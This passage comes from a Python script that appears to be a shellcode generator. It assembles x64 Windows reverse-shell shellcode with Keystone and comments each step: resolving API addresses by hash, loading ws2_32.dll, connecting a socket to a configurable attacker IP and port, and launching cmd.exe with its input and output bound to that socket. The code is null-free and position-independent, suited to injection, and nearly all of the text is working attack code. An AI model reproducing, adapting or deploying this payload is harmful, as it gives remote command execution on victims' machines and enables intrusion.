" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores the base address of the module, get the NT header offset
" xor r15, r15;"
" mov r15b, 0x88;" # Offset to Export Directory
" add r15, r9;"
" add r15, rcx;"
" mov r15d, dword ptr [r15];" # Get the RVA of the export directory
" add r15, r9;" # R14 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];" # ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];" # Get the RVA of ENPT
" add r14, r9;" # R14 stores the VMA of ENPT
"search_function:" # Search for a given function
" jrcxz not_found;" # If RCX is 0, the given function is not found
" dec ecx;" # Decrease index by 1
" xor rsi, rsi;"
" mov esi, [r14 + rcx*4];" # RVA of function name string
" add rsi, r9;" # RSI points to function name string
"function_hashing:" # Hash function name function
" xor rax, rax;"
" xor rdx, rdx;"
" cld;" # Clear DF flag
"iteration:" # Iterate over each byte
" lodsb;" # Copy the next byte of RSI to Al
" test al, al;" # If reaching the end of the string
" jz compare_hash;" # Compare hash
" ror edx, 0x0d;" # Part of hash algorithm
" add edx, eax;" # Part of hash algorithm
" jmp iteration;" # Next byte
"compare_hash:" # Compare hash
" cmp edx, r8d;"
" jnz search_function;" # If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];" # Ordinal table RVA
" add r10, r9;" # Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];" # Ordinal value -1
" mov r11d, [r15 + 0x1c];" # RVA of EAT
" add r11, r9;" # VMA of EAT
" mov eax, [r11 + 4*rcx];" # RAX stores RVA of the function
" add rax, r9;" # RAX stores VMA of the function
" ret;"
"not_found:"
" ret;"
"jump_section:" # Achieve PIC and elminiate 0x00 byte
" mov rbp, r9;" # RBP stores base address of Kernel32.dll
" mov r8d, 0xec0e4e8e;" # LoadLibraryA Hash
" call parse_module;" # Search LoadLibraryA's address
" mov r12, rax;" # R12 stores the address of LoadLibraryA function
"load_module:"
" xor rax, rax;"
" mov ax, 0x6c6c;" # Save the string "ll" to RAX
" push rax;" # Push the string to the stack
" mov rax, 0x642E32335F325357;" # Save the string "WS2_32.D" to RAX
" push rax;" # Push the string to the stack
" mov rcx, rsp;" # RCX points to the "WS2_32.dll" string
" sub rsp, 0x20;" # Function prologue
" mov rax, r12;" # RAX stores address of LoadLibraryA function
" call rax;" # LoadLibraryA("ws2_32.dll")
" add rsp, 0x20;" # Function epilogue
" mov r14, rax;" # R14 stores the base address of ws2_32.dll
"call_wsastartup:"
" mov r9, rax;" # R9 stores the base address of ws2_32.dll
" mov r8d, 0x3bfcedcb;" # Hash of WSAStartup
" mov rbx, r9;" # Save the base address of ws2_32.dll to RBX for later use
" call parse_module;" # Search for and get the address of WSAStartup
" xor rcx, rcx;"
" mov cx, 0x198;"
" sub rsp, rcx;" # Reserve enough space for the lpWSDATA structure
" lea rdx, [rsp];" # Assign the address of lpWSAData to the RDX register as the 2nd parameter
" mov cx, 0x202;" # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter
" sub rsp, 0x30;" # Function prologue
" call rax;" # Call WSAStartup
" add rsp, 0x30;" # Function epilogue
"call_wsasocket:"
" mov r9, rbx;"
" mov r8d, 0xadf509d9;" # Hash of WSASocketA function
" call parse_module;" # Get the address of WSASocketA function
" sub rsp, 0x30;" # Function prologue
" xor rcx, rcx;"
" mov cl, 2;" # AF is 2 as the 1st parameter
" xor rdx, rdx;"
" mov dl, 1;" # Type is 1 as the 2nd parameter
" xor r8, r8;"
" mov r8b, 6;" # Protocol is 6 as the 3rd parameter
" xor r9, r9;" # lpProtocolInfo is 0 as the 4th parameter
" mov [rsp+0x20], r9;" # g is 0 as the 5th parameter, stored on the stack
" mov [rsp+0x28], r9;" # dwFlags is 0 as the 6th parameter, stored on the stack
" call rax;" # Call WSASocketA function
" mov r12, rax;" # Save the returned socket type return value in R12 to prevent data loss in RAX
" add rsp, 0x30;" # Function epilogue
"call_wsaconnect:"
" mov r9, rbx;"
" mov r8d, 0xb32dba0c;" # Hash of WSAConnect
" call parse_module;" # Get the address of WSAConnect
" sub rsp, 0x20;" # Allocate enough space for the socketaddr structure
" mov rcx, r12;" # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter
" xor rdx, rdx;"
" mov dl, 2;" # Set sin_family to AF_INET (=2)
" mov [rsp], rdx;" # Store the socketaddr structure
" xor rdx, rdx;"
f"{port_argument}" # Set local port dynamically
" mov [rsp+2], rdx;" # Pass the port value to the corresponding position in the socketaddr structure
f"{ip_argument}"
" mov [rsp+4], rdx;" # Pass IP to the corresponding position in the socketaddr structure
# " xor r8, r8;"
# " mov [rsp+8], r8;" # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working
" lea rdx, [rsp];" # Pointer to the socketaddr structure as the 2nd parameter
" xor r8, r8;"
" mov r8b, 0x16;" # Set namelen member to 0x16
" xor r9, r9;" # lpCallerData is 0 as the 4th parameter
" sub rsp, 0x38;" # Function prologue
" mov [rsp+0x20], r9;" # lpCalleeData is 0 as the 5th parameter
" mov [rsp+0x28], r9;" # lpSQOS is 0 as the 6th parameter
" mov [rsp+0x30], r9;" # lpGQOS is 0 as the 7th parameter
" call rax;" # Call WSAConnect
" add rsp, 0x38;" # Function epilogue
"call_createprocess:"
" mov r9, rbp;" # R9 stores the base address of Kernel32.dll
" mov r8d, 0x16b3fe72;" # Hash of CreateProcessA
" call parse_module;" # Get the address of CreateProcessA
f"{shell_type}"
" push rdx;"
" mov rdx, rsp;" # Pointer to "cmd.exe" is stored in the RCX register
" push r12;" # The member STDERROR is the return value of WSASocketA
" push r12;" # The member STDOUTPUT is the return value of WSASocketA
" push r12;" # The member STDINPUT is the return value of WSASocketA
" xor rcx, rcx;"
" push cx;" # Pad with 0x00 before pushing the dwFlags member, only the total size matters
" push rcx;"
" push rcx;"
" mov cl, 0xff;"
" inc cx;" # 0xff+1=0x100
" push cx;" # dwFlags=0x100
" xor rcx, rcx;"
" push cx;" # Pad with 0 before pushing the cb member, only the total size matters
" push cx;"
" push rcx;"
" push rcx;"
" push rcx;"
" push rcx;"
" push rcx;"
" push rcx;"
" mov cl, 0x68;"
" push rcx;" # cb=0x68
" mov rdi, rsp;" # Pointer to STARTINFOA structure
" mov rcx, rsp;"
" sub rcx, 0x20;" # Reserve enough space for the ProcessInformation structure
" push rcx;" # Address of the ProcessInformation structure as the 10th parameter
" push rdi;" # Address of the STARTINFOA structure as the 9th parameter
" xor rcx, rcx;"
" push rcx;" # Value of lpCurrentDirectory is 0 as the 8th parameter
" push rcx;" # lpEnvironment=0 as the 7th argument
" push rcx;" # dwCreationFlags=0 as the 6th argument
" inc rcx;"
" push rcx;" # Value of bInheritHandles is 1 as the 5th parameter
" dec cl;"
" push rcx;" # Reserve space for the function return area (4th parameter)
" push rcx;" # Reserve space for the function return area (3rd parameter)
" push rcx;" # Reserve space for the function return area (2nd parameter)
" push rcx;" # Reserve space for the function return area (1st parameter)
" mov r8, rcx;" # lpProcessAttributes value is 0 as the 3rd parameter
" mov r9, rcx;" # lpThreatAttributes value is 0 as the 4th parameter
" call rax;" # Call CreateProcessA
)
ks = Ks(KS_ARCH_X86, KS_MODE_64)
encoding, count = ks.asm(CODE)
output_shellcode(lan,encoding,var,save)